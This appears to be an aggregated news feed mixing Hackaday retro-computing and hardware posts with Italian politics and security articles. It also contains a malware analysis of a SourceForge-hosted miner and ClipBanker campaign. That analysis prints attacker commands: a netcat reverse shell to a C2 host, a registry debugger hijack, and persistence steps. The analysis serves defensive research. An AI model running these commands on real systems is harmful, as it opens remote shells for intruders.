ASCII to Mainframe
IBM mainframes are known for very unusual terminals. But IBM made many different things, including the IBM 3151 ASCII terminal, which uses a cartridge to emulate a VT220 terminal. [Norbert Keher] has one and explains in great detail how to connect it to a mainframe.
It had the 3151 personality cartridge for emulating multiple IBM and DEC terminals. However, the terminal would not start until he unplugged it. The old CRT was burned in with messages from an IBM 3745, which helped him work out some of the configuration.
If you’ve only used modern ASCII terminals, you might not realize that many terminals from IBM and other vendors used to use a block mode where the computer would dump a screen to the terminal. You could “edit” the screen (that is, fill in forms or enter lines). Then you’d send the whole screen back in one swoop. This is “block” mode, and some of the terminals the 3151 can emulate are character mode, and others are block mode, which explains its odd keyboard and commands.
[Norbert] gets the terminal running with a virtual mainframe, but along the way, he explains a lot about what’s going on. The video is about an hour long, but it is an hour well spent if you are interested in mainframe history.
Of course, you can always get the real deal to connect. If you don’t have your own virtual mainframe, you are missing out.
youtube.com/embed/V14ac9cRi9Q?…
freezonemagazine.com/rubriche/…
Questo concerto è a mio parere un documento preziosissimo di due musicisti che hanno dato vita a collaborazioni live di grande pregio. Me ne accorsi il 13 novembre 2018 quando questo duo si esibì all’Officina della Musica di Como sorprendendomi per l’abilità, l’affiatamento e la magia musicale che seppero creare, ho dovuto aspettare qualche tempo […]
Designing A Tone Control Properly
Many years ago, audio equipment came with a tone control, a simple RC filter that would cut or boost the bass to taste. As time passed, this was split into two controls for bass and treble, and then finally into three for bass, mid, and treble. When audiophile fashion shifted towards graphic equalisers, these tone controls were rebranded as “3-band graphic equalisers”, a misleading term if ever we heard one. [Gabriel Dantas] designed one of these circuits, and unlike the simple passive networks found on cheap music centres of old, he’s doing a proper job with active filters.
The write-up is worth a read even if you are not in the market for a fancy tone control, for the basic primer it gives on designing an audio filter. The design contains, as you might expect, a low-pass, a bandpass, and a high-pass filter. These are built around TL072 FET-input op-amps, and an LM386 output stage is added to drive headphones.
The final project is built on a home-made PCB, complete with mains power supply. Audiophiles might demand more exotic parts, but we’re guessing that even with these proletarian components it will still sound pretty good. Probably better than the headphone amplifier featured in a recent project from a Hackaday writer, at least. There’s a build video, below the break.
youtube.com/embed/bzCQj5K0yOU?…
Cybersecurity e Board aziendale: smettiamola di parlare di patch. Parliamo di soldi
Ogni anno si ripete lo stesso rituale: il responsabile IT o il CISO si presenta al Board per chiedere un budget per la sicurezza informatica. E puntualmente si scontra con una porta semiaperta, se non direttamente chiusa. “Non ci sono fondi”, “Non è prioritario”, “Ne riparliamo l’anno prossimo”.
Il motivo? Spesso non è una mancanza di interesse, ma un problema di comunicazione.
Parlate di vulnerabilità, ma il Board pensa a ricavi
C’è un errore sistemico in molte aziende: i team tecnici parlano di firewall, vulnerabilità, CVE, sistemi obsoleti, mentre il Board vuole sentire parlare di soldi, rischio, impatto e produttività.
Il divario tra linguaggio tecnico e linguaggio business è abissale. E finché i professionisti della sicurezza non impareranno a colmarlo, continueranno a ottenere “no” come risposta.
Il Board non ha bisogno di sapere che è uscita una vulnerabilità con CVSS 9.8. Ha bisogno di sapere che quella vulnerabilità, se sfruttata, può bloccare la produzione per 4 giorni, con un danno economico stimato di 600.000 euro, più potenziali sanzioni per violazione GDPR.
Il lessico è potere
Quando ci si presenta a un CDA o a una direzione generale, non si può parlare la lingua della sala server. Serve il linguaggio dell’economia aziendale.
Parole chiave come “fermo produzione”, “rischio operativo”, “danno reputazionale”, “impatto finanziario”, “compliance”, “investimento per la resilienza” sono molto più efficaci di “patch management” o “segmentazione di rete”.
Chi siede nel Board ha responsabilità strategiche. Non vuole sapere come proteggerete l’azienda. Vuole sapere quanto costa non farlo.
La cybersecurity non è una spesa IT. È un’assicurazione sul futuro dell’azienda
Trattare la sicurezza come una “voce di spesa tecnica” è un errore.
La cybersecurity è una funzione di governance, un’estensione del risk management, una tutela della continuità operativa.
Eppure, in troppe aziende, continua a essere confinata all’IT, percepita come un centro di costo anziché come una barriera contro il disastro.
L’attacco ransomware che ha colpito l’azienda X non è stato un problema tecnico: è stato un blocco totale delle vendite, una crisi reputazionale, una fuga di clienti e una sanzione di 4 milioni di euro.
Questo è il modo in cui dobbiamo raccontare la cybersecurity.
Dal tecnicismo all’advocacy del rischio
Il professionista della sicurezza oggi non è solo un tecnico. È un ambasciatore del rischio.
Deve saper costruire scenari, stimare impatti, fare storytelling attorno alle minacce, contestualizzandole nel core business dell’azienda.
Non serve terrorismo psicologico, ma serve consapevolezza.
Non serve parlare di exploit e buffer overflow, ma serve mostrare cosa succede se i sistemi si fermano per due giorni, o se il nome dell’azienda finisce sui giornali per un data breach.
FACCIAMO UN ESEMPIO DEGL’IMPATTI ECONOMICI REALI DI UN ATTACCO CYBER
1. Merce bloccata, clienti persi
Nel 2023, un’azienda di logistica europea ha subito un attacco ransomware che ha reso inaccessibili i sistemi WMS e TMS per 5 giorni.
Impatto diretto: 1,2 milioni di euro di perdite in spedizioni non evase, penali contrattuali e clienti persi.
Impatto reputazionale: due importanti partner hanno disdetto i contratti.
2. Danno d’immagine e calo in Borsa
Nel 2022, un’azienda quotata del settore manifatturiero ha subito un leak di dati sensibili sui fornitori.
Impatto reputazionale: notizia su media nazionali e internazionali.
Impatto finanziario: -7% in Borsa in una settimana.
Impatto legale: indagine da parte dell’autorità per la protezione dati e rischio di sanzione multimilionaria.
3. Fermo produzione in azienda chimica
Un gruppo industriale italiano nel 2024 ha subito un attacco che ha criptato i sistemi SCADA per 72 ore.
Danni stimati: oltre 2,8 milioni di euro tra stop produttivo, smaltimento prodotto non conforme, ripristino ambienti e consulenze forensi.
Il budget annuale richiesto per prevenire l’incidente era inferiore a 300.000 euro.
Smettiamo di spiegare, iniziamo a tradurre
Finché continueremo a parlare di “sistemi legacy e patch critiche” e non di “perdita di produttività e danno economico stimato”, continueremo a ricevere budget insufficienti.
Il problema non è (solo) culturale, è strategico: il Board non deve diventare tecnico, ma deve essere messo in condizione di capire cosa significa non investire in sicurezza.
E per farlo, serve un nuovo tipo di comunicazione: meno slide su configurazioni, più slide su numeri, stime e proiezioni di rischio.
Parliamo la lingua di chi decide. Solo così potremo proteggere davvero le aziende.
L'articolo Cybersecurity e Board aziendale: smettiamola di parlare di patch. Parliamo di soldi proviene da il blog della sicurezza informatica.
Maronno Winchester reshared this.
#Trump e #Iran, trappola o diplomazia?
Trump e Iran, trappola o diplomazia?
Senza la minima preoccupazione per il mandato d’arresto internazionale per genocidio e crimini di guerra che pesa sulla sua testa, il primo ministro israeliano Netanyahu ha incontrato lunedì alla Casa Bianca il presidente americano Trump in un vertic…www.altrenotizie.org
The Computers of EPCOT
Even if you aren’t a Disney fan, you probably know about EPCOT — Experimental Prototype Community of Tomorrow — a Disney attraction that promised a glimpse of the future. [ErnieTech] takes a glimpse at the UNIVAC computer that ran the operation in the 1980s. A lot of schools had UNIVAC 1100-series computers back in those days, so while you don’t hear as much about them as, say, IBM 360s, there are hordes of people who have used the 1100s, even if they don’t remember it.
EPCOT opened in 1982, and it not only ran the attraction but was also visible as part of the exhibit’s ambiance. They even used the Pepper’s Ghost illusion to superimpose a little man on top of the equipment.
Sperry used the relationship with Disney for promotional purposes. We’ve never found a good emulator for the 1100s. The UNIVAC had a 36-bit word and 6-bit characters. We’d love to see something like Hercules that could support Exec 8.
The UNIVAC originated with the Remington Rand company, which had bought Eckert-Mauchly Computer Corporation. Remington Rand later merged with the Sperry Corporation to become Sperry Rand. Eventually, the company reverted to the Sperry name before merging with Burroughs in 1986 to form UNISYS — a company that still exists today.
youtube.com/embed/fd7IiBOIwDM?…
Data center, il governo prova a definire una strategia nazionale
Nelle ultime tre settimane, al ministero delle Imprese e del made in Italy il team dello sportello per l'attrazione degli investimenti esteri ha iniziato a raccogliere una serie di informazioni per produrre poi un dossier da recapitare sulla scrivania del ministro, Adolfo Urso. Il gruppo ha bussato alla porta delle Regioni, per farsi indicare se ci sono zone che stanno andando in saturazione per numero di data center (come la Lombardia, dove si concentrano impianti per 23,3 GW di consumi sui 40 installati complessivamente lungo lo Stivale) o aree che intendono orientare a questi progetti.
wired.it/article/data-center-s…
@Informatica (Italy e non Italy 😁)
Data center, c'è chi prova a scrivere una strategia nazionale
Al ministero delle Imprese e del made in Italy un team sta raccogliendo dati da Regioni, Demanio e altri enti per impostare un approccio univoco agli investimenti esteri in centri di elaborazione datiLuca Zorloni (Wired Italia)
reshared this
Scambi UE-USA: fatti e cifre (dati del 2023)
Per chi volesse saperne di più su quanto e cosa scambiano UE e USA nei loro rapporti commerciali.
In sintesi, l'UE importa in prevalenza servizi ed esporta in prevalenza prodotti. Gli scambi tra UE e USA rappresentano da soli il 30% degli scambi mondiali. L'UE ha un "utile" di 48 miliardi di euro (ovvero, esportazioni - importazioni = 48 mld)
Rendere più solida la cooperazione Nato-Ue è una priorità per l’Occidente
@Notizie dall'Italia e dal mondo
Partiamo da un presupposto. Essere parte della Nato è un privilegio che – come tutti i privilegi – comporta anche delle responsabilità. Dopo la brutale aggressione della Russia all’Ucraina, dopo quanto accaduto il 7 ottobre in Israele, è divenuto urgente parlare di
Notizie dall'Italia e dal mondo reshared this.
Il Signalgate dimostra che l’anello debole della sicurezza è (ancora) l’essere umano
@Informatica (Italy e non Italy 😁)
Il Signalgate ha messo in evidenza una delle contraddizioni più insidiose della nostra epoca digitale: l’uso di strumenti concepiti per garantire il massimo livello di riservatezza che, se utilizzati in modo disinvolto o privo di
Informatica (Italy e non Italy 😁) reshared this.
Tutto su Andrea Mavilla, l’esperto che ha scovato online i numeri di telefono dei vertici dello Stato e ha sbeffeggiato l’Acn
@Informatica (Italy e non Italy 😁)
Dal presidente della Repubblica Mattarella alla presidente del Consiglio Meloni, online i numeri di telefono privati dei vertici dello Stato: è quanto ha
Informatica (Italy e non Italy 😁) reshared this.
FreeDOS 1.4 Released
Even in 2025 there are still many applications for a simple Disk Operating System (DOS), whether this includes running legacy software (including MS-DOS games & Windows 3.x), or (embedded) systems running new software where the overhead of a full-fat Linux or BSD installation would be patently ridiculous.
This is where the FreeDOS project provides a modern, fully supported DOS, with the recent 1.4 release adding a whole range of features and updates to existing components like the FreeCOM command shell. This is the first stable release since 1.3 was released in 2022.
FreeDOS saw its first release in 1994 and has become the de facto replacement for MS-DOS — featuring many improvements to make it work well on modern hardware and a package manager to manage installed software much like on Linux & BSD. The new kernel didn’t quite make it into this release, but it and some other items will be available in the monthly test builds.
You can download the new 1.4 release here, with live & installer CD images, a USB installer and even a Floppy Edition available. System requirements include an (Intel) x86 CPU, a BIOS (or legacy UEFI mode), 640 kB of RAM and 20 MB of storage.
mrasd2k2 reshared this.
Turning Old Cellphones into SBCs
[David] sent us a tip about a company in Belgium, Citronics, that is looking to turn old cellphones into single-board computers for embedded Linux applications. We think it’s a great idea, and have long lamented how many pocket supercomputers simply get tossed in the recycling stream, when they could be put to use in hacker projects. So far, it looks like Citronics only has a prototyping breakout board for the Fairphone 2, but it’s a promising idea.
One of the things that’s stopping us from re-using old phones, of course, is the lack of easy access to the peripherals. On the average phone, you’ve got one USB port and that’s it. The Citronics dev provides all sorts of connectivity: 4x USB 2.0, 1x Ethernet 10/100M, and a Raspberry Pi Header (UART, SPI, I2C, GPIO). At the same time, for better or worse, they’ve done away with the screen and its touch interface, and the camera too, but they seem to be keeping all of the RF capabilities.
The whole thing runs Linux, which means that this won’t work with every phone out there, but projects like PostmarketOS and others will certainly broaden the range of usable devices. And stripping off the camera and screen has the secondary advantages of removing the parts that get most easily broken and have the least support from custom Linux distros.
We wish we had more details about the specifics of the break-out boards, but we like the idea. How long before we see an open-source implementation of something similar? There are so many cheap used and broken cellphones out there that it’s certainly a worthwhile project!
Offerta Speciale: Paghi il Telefono ed in omaggio ricevi un Malware! La nuova ondata Triada
Gli specialisti di Kaspersky Lab hanno scoperto una nuova versione del malware Triada. Il malware è stato trovato sui nuovi dispositivi Android. Secondo l’azienda, solo dal 13 al 27 marzo 2025, più di 2.600 utenti in diversi Paesi hanno incontrato la nuova versione di Triada.
Gli esperti scrivono che la nuova versione di Triada è distribuita nel firmware dei dispositivi Android infetti e si trova nel framework di sistema. Ciò significa che il malware può penetrare in ogni processo dello smartphone della vittima.
Il malware ha ampie funzionalità e offre agli aggressori opportunità pressoché illimitate di controllare il gadget, ad esempio è in grado di:
- dirottare gli account degli utenti nei servizi di messaggistica istantanea e nei social network, in particolare Telegram e TikTok;
- inviare segretamente messaggi presumibilmente per conto della vittima su WhatsApp e Telegram, e poi cancellarli per cancellare le tracce;
- rubare criptovalute sostituendo gli indirizzi dei portafogli crittografici nelle applicazioni richieste;
- monitorare l’attività della vittima nei browser e sostituire i link;
- sostituire i numeri durante le chiamate (per reindirizzare l’abbonato al contatto necessario agli aggressori);
- controllare gli SMS (intercettare, inviare ed eliminare i messaggi);
- consentire l’invio di SMS premium per ricevere servizi a pagamento;
- scaricare ed eseguire altri programmi sullo smartphone infetto;
- bloccare le connessioni di rete, ad esempio per interferire con il funzionamento dei sistemi antifrode.
“Il Trojan Triada è noto da molto tempo e rimane ancora una delle minacce più complesse e pericolose per Android. La sua nuova versione penetra nel firmware degli smartphone prima ancora che i gadget raggiungano le mani degli utenti. È probabile che a un certo punto la catena di fornitura venga compromessa, quindi i negozi potrebbero non sapere nemmeno di vendere smartphone basati su Triada. Allo stesso tempo, gli autori della nuova versione di Triada stanno monetizzando attivamente i loro sforzi. Sulla base dell’analisi delle transazioni, sono stati in grado di trasferire circa $ 270.000 in diverse criptovalute sui loro portafogli crittografici. Tuttavia, in realtà, questa cifra potrebbe essere più alta, poiché gli aggressori hanno preso di mira anche Monero, una criptovaluta non rintracciabile”, commenta Dmitry Kalinin, esperto di sicurezza informatica presso Kaspersky Lab.
Si segnala che gli smartphone infetti possono essere acquistati presso negozi online non autorizzati, ma non viene specificato quali. Ricordiamo che non è la prima volta che i ricercatori avvertono che Triada può essere preinstallato sui dispositivi Android, che finiscono per essere infettati fin dal primo momento.
Ad esempio, nel 2018, gli specialisti di Doctor Web avevano lanciato l’allarme in merito alla scoperta di 42 modelli di smartphone Android economici infettati da Triada. E nel 2023, il ricercatore indipendente sulla sicurezza informatica Daniel Milisic ha segnalato un malware preinstallato su vari dispositivi.
Di solito, in questi casi si parla di dispositivi economici e gadget di provenienza molto dubbia. Per questo motivo, gli esperti raccomandano di acquistare gli smartphone solo da rivenditori autorizzati e di installare soluzioni di sicurezza per una maggiore tranquillità.
L'articolo Offerta Speciale: Paghi il Telefono ed in omaggio ricevi un Malware! La nuova ondata Triada proviene da il blog della sicurezza informatica.
Fili di guerra. Dopo quelli aerei, Kyiv sperimenta la fibra ottica nei droni terrestri
@Notizie dall'Italia e dal mondo
Nel conflitto ucraino sia le forze russe che quelle ucraine stanno facendo sempre più spesso ricorso a fibre ottiche cablate per i collegamenti di controllo dei droni aerei First-person-view (Fpv). Tali collegamenti non possono infati essere disturbati dalle apparecchiature di guerra elettronica, e non
Notizie dall'Italia e dal mondo reshared this.
Un trilione di dollari per la Difesa Usa. Ecco il piano di Trump per il 2026
@Notizie dall'Italia e dal mondo
Il più grande stanziamento per la Difesa statunitense dalla Seconda guerra mondiale, questa l’idea di Donald Trump per potenziare le Forze armate e rilanciare la dottrina Peace through strength. “Abbiamo approvato un bilancio, vi piacerà sentirlo, che si aggira
Notizie dall'Italia e dal mondo reshared this.
Vulnerabilità dei sistemi anticollisione nell’aviazione civile: come mitigare i rischi
@Informatica (Italy e non Italy 😁)
Sono due le vulnerabilità scoperte e possono causare alterazioni nel funzionamento dei sistemi anticollisione in uso nei velivoli di aviazione civile. Ecco come sono state rilevate e perché le patch sono urgenti
L'articolo Vulnerabilità
Informatica (Italy e non Italy 😁) reshared this.
Another Masterful Gambit: DOGE Moves From Secure, Reliable Tape Archives to Hackable Digital Records
DOGE claimed it saved "$1M per year" by converting 14,000 magnetic tapes to digital storage.Samantha Cole (404 Media)
Radio MIR. Sinistra, nuovi scenari di guerra e difesa dei diritti
I mutati scenari di guerra stanno travolgendo l'ordine mondiale creato dopo la fine dell'Unione Sovietica. La globalizzazione sia dei diritti che dell'economiaRifondazione Comunista
Il 19enne membro della cyber-gang d’élite Scattered Spider rischia 60 anni di reclusione
Un membro del gruppo hacker di Scattered Spider, è stato accusato di furto di criptovaluta su larga scala e operazioni di hacking dei sistemi aziendali. Noah Michael Urban è stato arrestato all’inizio del 2024 , patteggiando le accuse in Florida, dove è stato accusato di frode e furto di identità. Ora rischia fino a 60 anni di carcere.
Secondo gli inquirenti, Urban, era un membro chiave di uno dei gruppi di hacker più aggressivi degli ultimi anni. Scattered Spider è diventato famoso per l’utilizzo del SIM Swapping, un metodo che consente di prendere il controllo del numero di telefono della vittima e di aggirare l’autenticazione a due fattori. Grazie a questa tecnica il gruppo ha avuto accesso a portafogli crittografici, sistemi aziendali e documenti.
Urban e i suoi complici hanno operato tra agosto 2022 e marzo 2023. Durante questo periodo, secondo l’accusa, sono riusciti a rubare milioni di dollari in criptovaluta, nonché a penetrare nell’infrastruttura IT di grandi aziende, da cui sono stati rubati dati riservati. Durante la perquisizione, a casa di Urban sono stati sequestrati beni digitali per un valore di 2,89 milioni di dollari, conservati sul suo computer di casa.
Secondo i documenti del caso, tre imputati sono stati arrestati, mentre la sorte degli altri due resta sconosciuta. Si stima che i danni totali causati dalle azioni del gruppo siano compresi tra 9,5 e 25 milioni di dollari. Urban si è impegnato a risarcire più di 13 milioni di dollari a favore di più di 30 vittime e ha inoltre rinunciato a tutti i fondi digitali sequestrati.
Gli investigatori hanno scoperto che sotto gli pseudonimi “Sosa”, “Elijah” e “King Bob”, Urban, insieme ad altri membri della “comunità”, era attivamente coinvolto nell’hacking di account, negli attacchi di phishing e nell’utilizzo di dati rubati per ottenere l’accesso ai portafogli crittografici. In un caso, ha hackerato l’account del conglomerato mediatico americano AOL, ha eseguito con successo uno scambio di SIM tramite l’operatore AT&T e ha rubato circa 374 mila dollari.
Durante gli interrogatori, Urban ha confermato di aver ricevuto criptovaluta esclusivamente tramite attività criminali nell’ambito di Scattered Spider. A sole 16 vittime sono stati rubati oltre 2,6 milioni di dollari. Secondo le sue stime, tra gennaio 2021 e marzo 2023 ha guadagnato personalmente diversi milioni di dollari e ha preso parte a furti per importi ancora maggiori.
In passato i giornalisti avevano anche collegato Urban ad attacchi contro musicisti famosi e a fughe di notizie di album inediti. Secondo l’atto d’accusa, avrebbe collaborato con Ahmed Hossam Elbadewi, Evans Osiebo, Joel Evans, Tyler Buchanan e altri. Tra le vittime figurano aziende operanti nei settori dell’intrattenimento, delle telecomunicazioni, delle tecnologie cloud e dei servizi di criptovaluta.
Scattered Spider ha colpito anche MGM e Caesars nel 2023, così come gli attacchi informatici a Coinbase, Twilio, Mailchimp, LastPass, Riot Games e Reddit. Secondo i dati La recente campagna di phishing del gruppo Group-IB ha portato alla compromissione di circa 10.000 account di 136 organizzazioni.
Le autorità statunitensi sottolineano che i membri di Scattered Spider sono madrelingua inglese. Ciò a conferito loro un vantaggio nell’ingegneria sociale. Hanno utilizzato con successo tattiche di Man in the Middle e attacchi di phishing tramite SMS,
L'articolo Il 19enne membro della cyber-gang d’élite Scattered Spider rischia 60 anni di reclusione proviene da il blog della sicurezza informatica.
Rapporto Amnesty. Pena di morte nel 2024: record di esecuzioni dal 2015
@Notizie dall'Italia e dal mondo
Iran, Iraq e Arabia Saudita responsabili del 91 per cento delle esecuzioni. La pena capitale è usata come strumento di repressione contro manifestanti e gruppi etnici. Aumento delle esecuzioni per reati legati alla droga
L'articolo Rapporto Amnesty. Pena di morte nel
Notizie dall'Italia e dal mondo reshared this.
Attackers distributing a miner and the ClipBanker Trojan via SourceForge
Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge, a popular website providing software hosting, comparison, and distribution services. The site hosts numerous software projects, and anyone can upload theirs. One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project. The description and contents of officepackage provided below were also taken from GitHub.
Description of the “officepackage” project
Few know that projects created on sourceforge.net get a sourceforge.io domain name and web hosting services. Pages like that are well-indexed by search engines and appear in their search results.
Example of a search query and results containing officepackage.sourceforge.io
The project under investigation has been assigned the domain officepackage.sourceforge[.]io, but the page displayed when you go to that domain looks nothing like officepackage on sourceforge.net. Instead of the description copied from GitHub, the visitor is presented with an imposing list of office applications complete with version numbers and “Download” buttons.
The project as seen on the officepackage.sourcefoge.io domain
Hovering over one of the buttons reveals a seemingly legit URL in the browser status bar: https[:]//loading.sourceforge[.]io/download. It is easy to make the mistake of associating that URL with officepackage, as the buttons are on that project’s page. However, the loading.sourceforge.io domain suggests a different project on sourceforge.net, named loading.
URL associated with the “Download” button
Clicking the link redirects to a page with yet another “Download” button, this time in English.
Page for downloading the suspicious archive
Clicking that button finally downloads a roughly seven-megabyte archive named vinstaller.zip. This raises some red flags, as office applications are never that small, even when compressed.
The infection chain: from searching for office software to downloading an installer
The downloaded archive contains another password-protected archive, installer.zip, and a Readme.txt file with the password.
Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer. Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes. After we stripped the junk bytes, its true size was 7 megabytes.
Running the installer creates several files, with two being of interest to us: UnRAR.exe (a console archive utility) and a password-protected archive named 51654.rar. The installer then executes an embedded Visual Basic script. Attackers have long distributed password-protected archives along with unpacking utilities, passing the password via the command line. However, this case has an intermediary step. The installer files lack an archive password. Instead, to continue the infection chain, the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub. This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.
The infection chain: from launching the installer to downloading the confvk batch script
Here is a breakdown of how the batch script works. First, it checks for an existing infection by searching for the AutoIt interpreter at a specific path. If AutoIt is found, the script deletes itself and exits. If not, the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.
If both checks pass, the script unpacks the RAR archive and runs two PowerShell scripts within its code.
"%ProgramData%\dist\UnRAR.exe" x -y -p147852369 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\"
Command to unpack the RAR archive executed by the batch file
One of the PowerShell scripts sends a message to a certain chat using the Telegram API. The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.
Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script
The other PowerShell script downloads another batch file, confvz, to process the files that were extracted from the RAR archive.
The contents of the archive can be seen in the screenshot above. Below is a summary of each file.
File | Description |
Input.exe | AutoIt script interpreter |
Icon.dll | Clean dynamic-link library with a compressed AutoIt script appended to it |
Kape.dll | Clean dynamic-link library with a compressed AutoIt script appended to it |
ShellExperienceHost.exe | Netcat network utility executable |
libssl-1_1.dll | Netcat dependency dynamic-link library |
vcruntime140.dll | Netcat dependency dynamic-link library |
libcrypto-1_1.dll | Netcat dependency dynamic-link library |
The confvz batch file creates three subdirectories at %ProgramData% and moves the unpacked archive files into those. The first subdirectory receives Input.exe and Icon.dll, the second gets another Input.exe copy with Kape.dll, and the third gets all netcat files. The batch file then creates ini.cmd and init.cmd batch scripts at %USERPROFILE%\Cookies\ to run the files it copied. These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll (both containing compressed AutoIt scripts) as arguments.
Contents of the confvz batch file
Next, confvz generates keys in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\*. These link to the ini.cmd and init.cmd batch files. The keys allow running files using shortened names. For example, the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"::"%USERPROFILE%\Cookies\ini.cmd
launches ini.cmd when running install.exe. Similarly, start.exe is registered as a link to init.exe, and Setup.exe links to the system utility %WINDIR%\System32\oobe\Setup.exe, normally launched during OS installation. We will revisit this utility later.
Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter without intermediate batch files.
Additionally, as a backup autostart method, confvz adds this registry key:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe"::Debugger="%WINDIR%\System32\cmd.exe /c start start.exe"
This runs a debugger when MicrosoftEdgeUpdate.exe is started. The debugger is set to execute start.exe, which, based on the earlier registry keys, points to init.cmd.
Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds. While disabled by default in more recent Windows versions, WMIC still functions in older systems.
The handler executes the following command:
ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe
ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection. This essentially creates a remote command line with apap[.]app:445 as the C2 server.
Finally, confvz creates a file:
%WINDIR%\Setup\Scripts\ErrorHandler.cmd
This is a custom script you can build in Windows to streamline troubleshooting during OS installation. If a critical error occurs, the %System32%\oobe\Setup.exe utility finds and executes this file. However, the attackers have found a way to exploit it for automatic startup. They achieve this by again using the operating system’s built-in WMIC utility to establish an event filter that triggers the handler every 300 seconds. The handler is specified as %WINDIR%\System32\cmd.exe /c start Setup.exe, while Setup.exe, according to the registry keys created earlier, references the utility %WINDIR%\System32\oobe\Setup.exe, which executes ErrorHandler.cmd upon launch. The ErrorHandler.cmd file contains a short PowerShell script that uses the Telegram API to retrieve and execute a text string. This is another remote command line, but its output is not sent anywhere.
The infection chain: from executing confvk to setting up all the auto-start methods
The key malicious actions in this campaign boil down to running two AutoIt scripts. Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker. ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own. Users of crypto wallets typically copy addresses instead of typing them. If the device is infected with ClipBanker, the victim’s money will end up somewhere entirely unexpected.
Victims
The officepackage.sourceforge[.]io site has a Russian interface, suggesting a focus on Russian-speaking users. Our telemetry indicates that 90% of potential victims are in Russia, where 4,604 users encountered the scheme between early January and late March.
Takeaways
Distributing malware disguised as pirated software is anything but new. As users seek ways to download applications outside official sources, attackers offer their own. They keep looking for new ways to make their websites look legit. The scheme described here exploits SourceForge feature of creating a sourceforge.io subdomain for each sourceforge.net repository.
The persistence methods are worthy of note as well. Attackers secure access to an infected system through multiple methods, including unconventional ones. While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.
We advise users against downloading software from untrusted sources. If you are unable to obtain some software from official sources for any reason, remember that seeking alternative download options always carries higher security risks.
LayerLapse Simplifies 3D Printer Time-lapse Shots
We know you’ve seen them: the time-lapses that show a 3D print coming together layer-by-layer without the extruder taking up half the frame. It takes a little extra work compared to just pointing a camera at the build plate, but it’s worth it to see your prints materialize like magic.
Usually these are done with a plugin for OctoPrint, but with all due respect to that phenomenal project, it’s a lot to get set up if you just want to take some pretty pictures. Which is why [Whopper Printing] put together the LayerLapse. This small PCB is designed to trigger your DSLR or mirrorless camera once its remotely-mounted hall effect sensor detects the presence of a magnet.The remote hall effect sensor.
The idea is that you just need to stick a small magnet to your extruder, add a bit of extra G-code that will park it over the sensor at the end of each layer, and you’re good to go. There’s even a spare GPIO pin broken out should you want to trigger something else on each layer of your print. Admittedly we can’t think of anything else right now that would make sense, other than some other type of camera, but we’re sure some creative folks out there could put this feature to use.
Currently, [Whopper Printing] is selling the LayerLapse as a finished product, though it does sound like a kit version is in the works. There’s also instructions for building a DIY version of the hardware using your microcontroller of choice. Whether you buy or build the hardware, the firmware is available under the MIT license for your tinkering pleasure.
Being hardware hackers, we appreciate the stand-alone nature of this solution. But if you’re already controlling your printer through OctoPrint, you’re probably better off just setting up one of the available time-lapse plugins.
Rsync: cos’è e come usarlo per creare backup dati sincronizzati sotto sistemi Linux
@Informatica (Italy e non Italy 😁)
Rsync è un tool open source che consente di effettuare in maniera semplice ed efficiente il backup dei dati sincronizzando i file e le cartelle tra la directory sorgente e la directory di destinazione, sia in locale che
Informatica (Italy e non Italy 😁) reshared this.
A Gaza il “perimetro” della morte. E un attacco choc alla tenda dei giornalisti
@Notizie dall'Italia e dal mondo
"Zona cuscinetto", così la chiamano a Tel Aviv. Ma per l'esercito israeliano è una nuova «Hiroshima». Ieri almeno 42 morti, tra cui un reporter di Palestine Today Tv Immagini strazianti
L'articolo A Gaza il “perimetro” della morte. E un attacco choc
Notizie dall'Italia e dal mondo reshared this.
Vennero anche Laura e Inti, due attori che fecero una toccante performance per Julian.
Ieri mattina con serenità e a casa, Laura ha lasciato il Corpo dopo la tremenda malattia.
Le funzioni si terranno a mercoledì 9 aprile alle 15 a Roma, alla chiesa degli Artisti Santa Maria in Montesanto. Chiunque voglia venire a dare un saluto a Laura ed eventualmente partecipare con una breve testimonianza artistica dopo la funzione nel piazzale antistante alla chiesa può segnalarlo qui.
Riposa in Pace Laura, nel paradiso di coloro che non si arrendono mai.
FREE ASSANGE Italia
L' 11 febbraio 2023 facemmo un sit-in per la liberazione di Assange davanti all'ambasciata australiana a Roma. Vennero anche Laura e Inti, due attori che fecero una toccante performance per Julian.Telegram
Kinmen Rising Project-金門最後才子🇺🇦 reshared this.
Proteggere il WiFi nascondendo il nome? Si tratta di una falsa sicurezza
La sicurezza, soprattutto quando si parla di reti WiFi, è spesso oggetto di fraintendimenti e luoghi comuni. In questa serie di articoli della nostra Rubrica WiFI, vogliamo sfatare alcuni dei falsi miti più diffusi. Offrendo spiegazioni chiare, dati concreti e consigli pratici. L’obiettivo è aiutarti a muoverti con maggiore consapevolezza nel mondo delle connessioni senza fili
In ogni articolo affronteremo un mito, ne analizzeremo le origini, presenteremo evidenze tecniche e concluderemo con le nostre considerazioni e suggerimenti.
